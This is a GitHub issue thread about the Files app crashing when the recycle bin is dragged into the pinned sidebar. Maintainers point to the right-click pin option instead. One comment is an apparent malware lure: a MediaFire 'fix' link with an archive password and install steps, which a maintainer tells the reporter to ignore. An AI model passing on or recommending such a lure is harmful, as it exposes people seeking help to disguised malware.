### ISSUE TITLE
Cannot pin the recycle bin

### ISSUE THREAD

**Issue by Hissymaster** [files-community/Files#16120]
### Description

When you attempt to pin the recycle bin folder, files immediately crashes

### Steps To Reproduce

1. Open files
2. find the recycle bin on your desktop
3. drag the recycle bin to the pinned section
4. drop to attempt to pin it
5. Files Crashes

### Requirements

- Fix crash that occurs when dropping the recycle bin into Pinned

### Files Version

3.6.17.0

### Windows Version

10.0.22631.4112

### Log File

[debug.log](https://github.com/user-attachments/files/16830732/debug.log)

**Comment by yaira2** [comment]
Drag and dropping items to the sidebar doesn't pin them, you can however do the following:
1. Open Recycle Bin in Files by entering `shell:recyclebinfolder` into the path bar
2. Right click empty space
3. Click pin to sidebar

**Comment by Hissymaster** [comment]
no such option appears to exist on my end.

**Comment by Hissymaster** [comment]
i have cut, copy, paste, select all. that's it.

**Comment by Josh65-2201** [comment]
Can you send a screenshot of the full window

**Comment by Hissymaster** [comment]
![Screenshot 2024-09-02 092203](https://github.com/user-attachments/assets/640a3270-0826-48b1-845f-f90f91c08152)

**Comment by Josh65-2201** [comment]
Right click the empty space of the folder, not the path bar

**Comment by Hissymaster** [comment]
more footage of the issue in action if you need it.

https://github.com/user-attachments/assets/84fef308-0902-4e0d-83d5-4eecb80cb994


https://github.com/user-attachments/assets/d7ffbb6a-2508-40fd-aecf-fc7657abf42f

**Comment by Hissymaster** [comment]
Okay, sorry. it works with right click.

**Comment by Hissymaster** [comment]
The drag and drop was the issue here.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Hissymaster** [comment]
the second video is a demonstration of this issue.

**Comment by 0x5bfa** [comment]
@Hissymaster please ignore the message above yours.

**Comment by Hissymaster** [comment]
You can see me drop the recycle bin folder into the pinned section, but nothing happens. and sometimes, the window just closes. why? i have no clue.

**Comment by 0x5bfa** [comment]
> The drag and drop was the issue here.

It's on our todo but still not implemented.

**Comment by Hissymaster** [comment]
Sorry.

**Comment by Hissymaster** [comment]
Anyone who is having this issue refer to #6309
